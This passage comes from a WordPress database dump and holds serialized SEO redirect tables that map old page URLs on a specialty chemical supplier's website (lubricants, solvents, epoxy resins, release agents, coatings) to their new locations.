e";i:301;s:6:"format";s:5:"plain";}i:467;a:4:{s:6:"origin";s:56:"chemicals/lubricants/krytox-lubricants/krytox-fpg-grease";s:3:"url";s:73:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-fpg-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:468;a:4:{s:6:"origin";s:17:"product/ms-555557";s:3:"url";s:40:"product/heavy-duty-solvent-ms-555-ms-557";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:470;a:4:{s:6:"origin";s:40:"chemicals/solvents/solvsys/flux-removers";s:3:"url";s:47:"chemicals/solvents/solvsys/flux-remover-catalog";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:471;a:4:{s:6:"origin";s:17:"product/ms-560562";s:3:"url";s:34:"product/flux-cleaner-ms-560-ms-562";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:472;a:4:{s:6:"origin";s:28:"product/ms-755l-flux-remover";s:3:"url";s:28:"product/flux-remover-ms-755l";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:473;a:4:{s:6:"origin";s:17:"product/ms-725727";s:3:"url";s:35:"product/flux-removers-ms-755-ms-757";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:474;a:4:{s:6:"origin";s:15:"product/h0805ab";s:3:"url";s:26:"product/flux-remover-spray";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:475;a:4:{s:6:"origin";s:40:"product/850g-90xx-waterbased-acid-primer";s:3:"url";s:29:"product/ptfe-medical-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:476;a:4:{s:6:"origin";s:75:"chemicals/mold-release-agents/semi-permanent-release-agents/releasys-liquid";s:3:"url";s:77:"chemicals/mold-release-agents/semi-permanent-release-agents/injection-molding";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:477;a:4:{s:6:"origin";s:82:"chemicals/mold-release-agents/semi-permanent-release-agents/specialty-mold-release";s:3:"url";s:52:"chemicals/mold-release-agents/specialty-mold-release";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:478;a:4:{s:6:"origin";s:54:"chemicals/conformal-coating/conformal-coating-stripper";s:3:"url";s:61:"chemicals/conformal-coating/conformal-coating-stripping-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:479;a:4:{s:6:"origin";s:73:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-fpg-grease";s:3:"url";s:107:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-fpg-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}}', 'no'); 
INSERT INTO `wp_options` VALUES (24493, 'wpseo-premium-redirects-export-plain', 'a:402:{s:10:"index.html";a:2:{s:3:"url";s:0:"";s:4:"type";i:301;}s:43:"miller-stephenson.com/miller/conformal.html";a:2:{s:3:"url";s:46:"miller-stephenson/chemicals/conformal-coatings";s:4:"type";i:301;}s:19:"miller/support.html";a:2:{s:3:"url";s:7:"contact";s:4:"type";i:301;}s:26:"miller/military_specs.html";a:2:{s:3:"url";s:0:"";s:4:"type";i:301;}s:28:"miller/GPL_oils_greases.html";a:2:{s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/gpl-series";s:4:"type";i:301;}s:40:"miller-stephenson.com/miller/krytox.html";a:2:{s:3:"url";s:59:"miller-stephenson.com/chemicals/krytox-tribosys-finish-line";s:4:"type";i:301;}s:27:"miller/ptfe_lubricants.html";a:2:{s:3:"url";s:70:"chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants";s:4:"type";i:301;}s:47:"miller-stephenson.com/miller/adhesive_kits.html";a:2:{s:3:"url";s:51:"miller-stephenson.com/chemicals/epoxy-resin-systems";s:4:"type";i:301;}s:33:"miller/food_grade_lubricants.html";a:2:{s:3:"url";s:0:"";s:4:"type";i:301;}s:23:"miller/fluoroguard.html";a:2:{s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/vpf-krytox";s:4:"type";i:301;}s:25:"miller/vazo_overview.html";a:2:{s:3:"url";s:14:"chemicals/vazo";s:4:"type";i:301;}s:26:"miller/RNT_lubricants.html";a:2:{s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/nrt-series";s:4:"type";i:301;}s:26:"miller/release_agents.html";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:20:"miller/solvents.html";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:21:"miller/aerospace.html";a:2:{s:3:"url";s:81:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/aerospace-aviation-series";s:4:"type";i:301;}s:29:"miller/solvents_cleaners.html";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:39:"miller/media_head_plastic_cleaners.html";a:2:{s:3:"url";s:35:"product/plastic-glass-metal-cleaner";s:4:"type";i:301;}s:32:"miller/connector_lubricants.html";a:2:{s:3:"url";s:67:"chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants";s:4:"type";i:301;}s:36:"miller/fluoroextreme_lubricants.html";a:2:{s:3:"url";s:64:"chemicals/krytox-tribosys-finish-line/tribosys/pfpe-oils-greases";s:4:"type";i:301;}s:21:"miller/conformal.html";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:29:"miller/conformal_coating.html";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:25:"miller/XP_lubricants.html";a:2:{s:3:"url";s:69:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/krytox-xp-oil";s:4:"type";i:301;}s:32:"miller/other_release_agents.html";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:29:"miller/others_lubricants.html";a:2:{s:3:"url";s:37:"chemicals/krytox-tribosys-finish-line";s:4:"type";i:301;}s:20:"miller/Releases.html";a:2:{s:3:"url";s:39:"chemicals/release-agents/semi-permanent";s:4:"type";i:301;}s:27:"miller/npb_replacement.html";a:2:{s:3:"url";s:35:"chemicals/solvents/vertrel-solvents";s:4:"type";i:301;}s:13:"product/240ac";a:2:{s:3:"url";s:20:"product/krytox-240ac";s:4:"type";i:301;}s:13:"product/240ab";a:2:{s:3:"url";s:20:"product/krytox-240ab";s:4:"type";i:301;}s:13:"product/240aa";a:2:{s:3:"url";s:20:"product/krytox-240aa";s:4:"type";i:301;}s:13:"product/250ac";a:2:{s:3:"url";s:20:"product/krytox-250ac";s:4:"type";i:301;}s:13:"product/250ad";a:2:{s:3:"url";s:20:"product/krytox-250ad";s:4:"type";i:301;}s:37:"chemicals/krytox-tribosys-finish-line";a:2:{s:3:"url";s:43:"chemicals/krytox-tribosys-teflon-lubricants";s:4:"type";i:301;}s:52:"chemicals/krytox-tribosys-teflon-lubricants/tribosys";a:2:{s:3:"url";s:63:"chemicals/krytox-tribosys-teflon-lubricants/tribosys-lubricants";s:4:"type";i:301;}s:55:"chemicals/krytox-tribosys-teflon-lubricants/finish-line";a:2:{s:3:"url";s:61:"chemicals/krytox-tribosys-teflon-lubricants/teflon-lubricants";s:4:"type";i:301;}s:84:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/gpl-greases";a:2:{s:3:"url";s:91:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases";s:4:"type";i:301;}s:13:"product/240ad";a:2:{s:3:"url";s:20:"product/krytox-240ad";s:4:"type";i:301;}s:45:"introducing-releasys-our-newest-release-agent";a:2:{s:3:"url";s:22:"releasys-release-agent";s:4:"type";i:301;}s:125:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases/240-series";a:2:{s:3:"url";s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases/krytox-240-series";s:4:"type";i:301;}s:81:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/gpl-oils";a:2:{s:3:"url";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-oils";s:4:"type";i:301;}s:114:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases";a:2:{s:3:"url";s:121:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases";s:4:"type";i:301;}s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/250-series";a:2:{s:3:"url";s:139:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/krytox-250-series";s:4:"type";i:301;}s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/283-series";a:2:{s:3:"url";s:139:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/krytox-283-series";s:4:"type";i:301;}s:103:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases/gpl-220-227";a:2:{s:3:"url";s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases/krytox-gpl-220-227";s:4:"type";i:301;}s:92:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/electronic-grade-krytox-grease";a:2:{s:3:"url";s:99:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-electronic-grade-krytox-grease";s:4:"type";i:301;}s:12:"millerkrytox";a:2:{s:3:"url";s:27:"krytox-application-overview";s:4:"type";i:301;}s:87:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/ts4-krytox-thread-sealant";a:2:{s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-ts4";s:4:"type";i:301;}s:11:"krytox.html";a:2:{s:3:"url";s:27:"krytox-lubrication-overview";s:4:"type";i:301;}s:18:"miller/krytox.html";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:35:"chemicals/solvents/vertrel-solvents";a:2:{s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;}s:45:"vazo-free-radical-initiator-benefits-and-uses";a:2:{s:3:"url";s:27:"vazo-free-radical-initiator";s:4:"type";i:301;}s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/xht-series-krytox";a:2:{s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht";s:4:"type";i:301;}s:84:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/xht-greases";a:2:{s:3:"url";s:90:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease";s:4:"type";i:301;}s:104:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-ac-series";a:2:{s:3:"url";s:104:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac";s:4:"type";i:301;}s:63:"why-vertrel-specialty-fluids-are-a-suitable-replacement-for-npb";a:2:{s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;}s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aut-series";a:2:{s:3:"url";s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aut-series";s:4:"type";i:301;}s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/lvp-series";a:2:{s:3:"url";s:76:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-lvp-vpf";s:4:"type";i:301;}s:17:"product/1506-copy";a:2:{s:3:"url";s:23:"product/krytox-vpf-1506";s:4:"type";i:301;}s:12:"product/1514";a:2:{s:3:"url";s:23:"product/krytox-vpf-1514";s:4:"type";i:301;}s:12:"product/1525";a:2:{s:3:"url";s:23:"product/krytox-vpf-1525";s:4:"type";i:301;}s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/nrt-series";a:2:{s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt";s:4:"type";i:301;}s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/nrt-plss-series";a:2:{s:3:"url";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/krytox-nrt-plss";s:4:"type";i:301;}s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/nrt-8900-series";a:2:{s:3:"url";s:95:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/krytox-nrt-8900-series";s:4:"type";i:301;}s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series";a:2:{s:3:"url";s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series";s:4:"type";i:301;}s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/gpl-200-207";a:2:{s:3:"url";s:117:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-200-207";s:4:"type";i:301;}s:39:"chemicals/release-agents/semi-permanent";a:2:{s:3:"url";s:54:"chemicals/release-agents/semi-permanent-release-agents";s:4:"type";i:301;}s:19:"product/releasys-82";a:2:{s:3:"url";s:49:"product/releasys-82-semi-permanent-release-agents";s:4:"type";i:301;}s:8:"products";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/gpl-210-217";a:2:{s:3:"url";s:112:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-ep";s:4:"type";i:301;}s:117:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-220-227";a:2:{s:3:"url";s:119:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion";s:4:"type";i:301;}s:87:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series";a:2:{s:3:"url";s:78:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;}s:130:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240-series";a:2:{s:3:"url";s:123:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240";s:4:"type";i:301;}s:43:"chemicals/krytox-tribosys-teflon-lubricants";a:2:{s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;}s:89:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-ep";a:2:{s:3:"url";s:103:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure";s:4:"type";i:301;}s:19:"product/releasys-89";a:2:{s:3:"url";s:49:"product/releasys-89-semi-permanent-release-agents";s:4:"type";i:301;}s:81:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series";a:2:{s:3:"url";s:81:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd";s:4:"type";i:301;}s:80:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-s-series";a:2:{s:3:"url";s:87:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series";s:4:"type";i:301;}s:49:"product/releasys-89-semi-permanent-release-agents";a:2:{s:3:"url";s:37:"product/semi-permanent-release-agents";s:4:"type";i:301;}s:32:"opteon-sion-for-vapor-degreasing";a:2:{s:3:"url";s:28:"opteon-sion-vapor-degreasing";s:4:"type";i:301;}s:39:"product/fluoroextreme-dental-lubricants";a:2:{s:3:"url";s:38:"product/fluoroextreme-dental-lubricant";s:4:"type";i:301;}s:42:"mold-release-agents-which-is-right-for-you";a:2:{s:3:"url";s:19:"mold-release-agents";s:4:"type";i:301;}s:29:"npb-and-hcfc-225-replacements";a:2:{s:3:"url";s:21:"hfcc-npb-replacements";s:4:"type";i:301;}s:37:"product/semi-permanent-release-agents";a:2:{s:3:"url";s:36:"product/semi-permanent-release-agent";s:4:"type";i:301;}s:16:"product/releasys";a:2:{s:3:"url";s:38:"product/semi-permanent-release-agent-2";s:4:"type";i:301;}s:36:"product/semi-permanent-release-agent";a:2:{s:3:"url";s:37:"product/semi-permanent-release-agents";s:4:"type";i:301;}s:38:"product/semi-permanent-release-agent-2";a:2:{s:3:"url";s:42:"product/semi-permanent-mold-release-agents";s:4:"type";i:301;}s:19:"product/releasys-88";a:2:{s:3:"url";s:26:"product/mold-release-agent";s:4:"type";i:301;}s:19:"product/releasys-85";a:2:{s:3:"url";s:37:"product/rubber-molding-release-agents";s:4:"type";i:301;}s:21:"product/releasys-8500";a:2:{s:3:"url";s:36:"product/rubber-molding-release-agent";s:4:"type";i:301;}s:33:"krytox-tm7-for-tire-mold-industry";a:2:{s:3:"url";s:29:"krytox-tm7-tire-mold-industry";s:4:"type";i:301;}s:21:"product/releasys-8800";a:2:{s:3:"url";s:36:"product/composite-mold-release-agent";s:4:"type";i:301;}s:36:"krytox-solutions-automotive-industry";a:2:{s:3:"url";s:28:"krytox-automotive-lubricants";s:4:"type";i:301;}s:49:"product/releasys-82-semi-permanent-release-agents";a:2:{s:3:"url";s:30:"product/dry-film-release-agent";s:4:"type";i:301;}s:21:"product/releasys-8200";a:2:{s:3:"url";s:31:"product/dry-film-release-agents";s:4:"type";i:301;}s:16:"product/ms-122av";a:2:{s:3:"url";s:26:"product/ptfe-release-agent";s:4:"type";i:301;}s:16:"product/ms-122se";a:2:{s:3:"url";s:31:"product/ptfe-mold-release-agent";s:4:"type";i:301;}s:16:"product/ms-143te";a:2:{s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;}s:16:"product/ms-143xd";a:2:{s:3:"url";s:35:"product/dry-film-mold-release-agent";s:4:"type";i:301;}s:16:"product/ms-122ad";a:2:{s:3:"url";s:35:"product/dry-film-ptfe-release-agent";s:4:"type";i:301;}s:43:"chemicals/release-agents/ptfe-release-agent";a:2:{s:3:"url";s:44:"chemicals/release-agents/ptfe-release-agents";s:4:"type";i:301;}s:16:"product/ms-143ax";a:2:{s:3:"url";s:36:"product/universal-ptfe-release-agent";s:4:"type";i:301;}s:15:"product/ms-475c";a:2:{s:3:"url";s:34:"product/acrylic-conformal-coatings";s:4:"type";i:301;}s:15:"product/ms-477c";a:2:{s:3:"url";s:33:"product/acrylic-conformal-coating";s:4:"type";i:301;}s:33:"product/acrylic-conformal-coating";a:2:{s:3:"url";s:42:"product/acrylic-conformal-coating-mil-spec";s:4:"type";i:301;}s:15:"product/ms-465c";a:2:{s:3:"url";s:25:"product/acrylic-conformal";s:4:"type";i:301;}s:15:"product/ms-467c";a:2:{s:3:"url";s:23:"product/acrylic-coating";s:4:"type";i:301;}s:15:"product/ms-470c";a:2:{s:3:"url";s:35:"product/urethane-conformal-coatings";s:4:"type";i:301;}s:15:"product/ms-472c";a:2:{s:3:"url";s:24:"product/urethane-coating";s:4:"type";i:301;}s:14:"chemicals/vazo";a:2:{s:3:"url";s:33:"chemicals/vazo-radical-initiators";s:4:"type";i:301;}s:15:"product/vazo-64";a:2:{s:3:"url";s:33:"product/vazo-64-radical-initiator";s:4:"type";i:301;}s:15:"product/vazo-67";a:2:{s:3:"url";s:26:"product/radical-initiators";s:4:"type";i:301;}s:29:"chemicals/epoxy-resin-systems";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:18:"epoxy-and-coatings";a:2:{s:3:"url";s:11:"epoxy-resin";s:4:"type";i:301;}s:11:"epoxy-resin";a:2:{s:3:"url";s:30:"epoxy-resin-conformal-coatings";s:4:"type";i:301;}s:26:"product/radical-initiators";a:2:{s:3:"url";s:33:"product/vazo-67-radical-initiator";s:4:"type";i:301;}s:47:"product/shieldsys-rfi-nickel-conductive-coating";a:2:{s:3:"url";s:26:"product/conductive-coating";s:4:"type";i:301;}s:36:"product/ms-111-epoxy-stripping-agent";a:2:{s:3:"url";s:29:"product/epoxy-stripping-agent";s:4:"type";i:301;}s:15:"product/vazo-88";a:2:{s:3:"url";s:33:"product/vazo-88-radical-initiator";s:4:"type";i:301;}s:38:"product/fluoroextreme-dental-lubricant";a:2:{s:3:"url";s:24:"product/dental-lubricant";s:4:"type";i:301;}s:28:"opteon-sion-vapor-degreasing";a:2:{s:3:"url";s:36:"opteon-sion-vapor-degreasing-solvent";s:4:"type";i:301;}s:15:"product/vazo-52";a:2:{s:3:"url";s:33:"product/vazo-52-radical-initiator";s:4:"type";i:301;}s:15:"product/ms-114c";a:2:{s:3:"url";s:34:"product/conformal-coating-stripper";s:4:"type";i:301;}s:15:"product/suprion";a:2:{s:3:"url";s:22:"product/opteon-suprion";s:4:"type";i:301;}s:30:"product/fluoropolymer-coatings";a:2:{s:3:"url";s:38:"product/fluoropolymer-medical-coatings";s:4:"type";i:301;}s:55:"chemicals/conformal-coatings/silicone-confromal-coating";a:2:{s:3:"url";s:55:"chemicals/conformal-coatings/silicone-conformal-coating";s:4:"type";i:301;}s:15:"product/ms-460h";a:2:{s:3:"url";s:35:"product/silicone-conformal-coatings";s:4:"type";i:301;}s:15:"product/ms-462h";a:2:{s:3:"url";s:24:"product/silicone-coating";s:4:"type";i:301;}s:24:"product/silicone-coating";a:2:{s:3:"url";s:35:"product/silicone-electronic-coating";s:4:"type";i:301;}s:12:"home_003.htm";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:12:"home_002.htm";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:21:"products/default.aspx";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:12:"home_001.htm";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:13:"prodtable.htm";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:9:"additives";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:20:"connector-lubricants";a:2:{s:3:"url";s:61:"chemicals/lubricants/tribosys-lubricants/connector-lubricants";s:4:"type";i:301;}s:27:"low-global-warming-products";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:28:"protectiveconformal-coatings";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:18:"specialty-products";a:2:{s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;}s:29:"us-government-and-other-specs";a:2:{s:3:"url";s:12:"tech-support";s:4:"type";i:301;}s:57:"404.aspx?aspxerrorpath=/cobra-and-reg-aerosol-accessories";a:2:{s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;}s:70:"404.aspx?aspxerrorpath=/cobra-and-reg-aerosol-accessories/default.aspx";a:2:{s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;}s:85:"404.aspx?aspxerrorpath=/krytox®_fluorinated_synthetic_lubricant_aerosol/default.aspx";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:39:"404.aspx?aspxerrorpath=/krytox_cleaners";a:2:{s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;}s:52:"404.aspx?aspxerrorpath=/krytox_cleaners/default.aspx";a:2:{s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;}s:53:"404.aspx?aspxerrorpath=/other-lubricants/default.aspx";a:2:{s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;}s:20:"aero-duster/?print=y";a:2:{s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;}s:12:"aero-duster_";a:2:{s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;}s:12:"aero_002.htm";a:2:{s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;}s:12:"aero_010.htm";a:2:{s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;}s:16:"aerospace-grades";a:2:{s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;}s:25:"aerospace_grades/?print=y";a:2:{s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;}s:16:"aerospace_grades";a:2:{s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;}s:17:"alert_/?Archive=y";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:36:"camx_show_2014-booth_1974/?Archive=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:24:"cleaning_agent_/?print=y";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:36:"cobra®_solvent_spray_cleaning_brush";a:2:{s:3:"url";s:20:"product/cobra-duster";s:4:"type";i:301;}s:45:"cobra®_solvent_spray_cleaning_brush/?print=y";a:2:{s:3:"url";s:20:"product/cobra-duster";s:4:"type";i:301;}s:33:"cobra-and-reg-aerosol-accessories";a:2:{s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;}s:27:"conformal-coating-strippers";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:41:"conformal_coating_stripper_ms-114c_ms-115";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:20:"epoxy_resins_004.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:13:"contact_re-nu";a:2:{s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;}s:22:"contact_re-nu/?print=y";a:2:{s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;}s:17:"contact_re-nu_lgw";a:2:{s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;}s:46:"dupont%E2%84%A2-krytox%C2%AE-gpl-oils--greases";a:2:{s:3:"url";s:56:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series";s:4:"type";i:301;}s:43:"dupont%E2%84%A2-krytox%C2%AE-nrt-lubricants";a:2:{s:3:"url";s:49:"chemicals/lubricants/krytox-lubricants/krytox-nrt";s:4:"type";i:301;}s:43:"dupont%E2%84%A2-krytox%C2%AE-xht-lubricants";a:2:{s:3:"url";s:49:"chemicals/lubricants/krytox-lubricants/krytox-xht";s:4:"type";i:301;}s:36:"dupont_krytox_fluorinated_lubricants";a:2:{s:3:"url";s:38:"chemicals/lubricants/krytox-lubricants";s:4:"type";i:301;}s:7:"en-rust";a:2:{s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;}s:16:"en-rust/?print=y";a:2:{s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;}s:17:"en-rust1/?print=y";a:2:{s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;}s:21:"epikure-curing-agents";a:2:{s:3:"url";s:44:"chemicals/epoxy-resins/epikure-curing-agents";s:4:"type";i:301;}s:30:"epikure-curing-agents/?print=y";a:2:{s:3:"url";s:44:"chemicals/epoxy-resins/epikure-curing-agents";s:4:"type";i:301;}s:30:"epirez-waterborne-epoxy-resins";a:2:{s:3:"url";s:54:"chemicals/epoxy-resins/epirez-waterborne-resin-epi-rez";s:4:"type";i:301;}s:26:"epon-epoxy-resins/?print=y";a:2:{s:3:"url";s:33:"chemicals/epoxy-resins/epon-epoxy";s:4:"type";i:301;}s:13:"eponol-resins";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:28:"epoxy_adhesive-kits/?print=y";a:2:{s:3:"url";s:48:"chemicals/epoxy-resins/epoxy-adhesive-kit-ms-907";s:4:"type";i:301;}s:16:"epoxy_resins.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_002.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_003.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_005.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_006.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_007.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_009.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:20:"epoxy_resins_010.htm";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:28:"epoxy_stripping_agent_ms-111";a:2:{s:3:"url";s:29:"product/epoxy-stripping-agent";s:4:"type";i:301;}s:47:"extreme_high_temperature_release_agent/?print=y";a:2:{s:3:"url";s:41:"chemicals/release-agents/high-temperature";s:4:"type";i:301;}s:29:"fluorinated_lubricant_aerosol";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:35:"f